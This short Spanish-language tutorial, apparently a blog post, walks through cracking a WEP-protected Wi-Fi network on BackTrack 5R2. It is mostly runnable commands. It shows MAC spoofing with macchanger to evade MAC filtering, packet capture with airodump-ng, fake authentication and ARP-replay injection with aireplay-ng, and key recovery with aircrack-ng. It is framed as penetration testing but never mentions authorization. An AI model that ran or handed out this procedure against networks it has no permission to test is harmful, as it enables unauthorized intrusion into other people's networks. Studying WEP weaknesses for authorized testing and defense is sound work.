Pentesting en redes de tipo WEP

Sigo tratando de sacar tiempo para colocar información interesante;
El dia de hoy les traigo los pasos necesarios para hacer pruebas de penetración en una red con seguridad del tipo WEP - Wireless Equivalent Privacy.
Para este efecto, usaremos la version de Linux BackTrack 5R2; 

La primera parte es para encubrir nuestra dirección MAC, o si no encubrirla, ofuscarla tratando de mimetizarla como otro tipo de dispositivo o marca de dispositivo; muchas veces los routers tienen activada la función de Filtrado de MAC; tratando de evitar que un dispositivo que no se encuentre dentro de la lista de MAC autorizadas se conecte a la red; para este efecto, es decir cambiar nuestra MAC  utilizamos la herramienta macchanger; supremamente útil para estos casos.

En una consola o terminal ejecutamos:

# airmon-ng

# airmon-ng stop wlan0

# ifconfig wlan0 down

# macchanger --mac 00:11:22:33:44:55 wlan0

# airmon-ng start wlan0

Hasta aqui hemos cambiado la MAC de la tarjeta inalámbrica; ahora procedemos a buscar las redes:

# airodump-ng wlan0

Apretamos para detener push ctrl+c

Copiamos el BSSID de la red que queramos probar

# airodump-ng -c (numero del canal) -w wep123 --bssid (bssid) wlan0

mientras pwr sea más grande, mejor
el #Data debe ser alrededor de 20.000, para forzarlo:

#aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0

#aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0

Ahora esperamos a que nuestro #Data sobrepase los 20.000 y al hacerlo ejecutamos:

# aircrack-ng -n 64 -b (bssid) wep123-01.cap

Y listo; si tenenmos suficiente Data, lo mas seguro es que podamos recuperar la clave de la red.
Espero que les vaya muy bien en sus pruebas.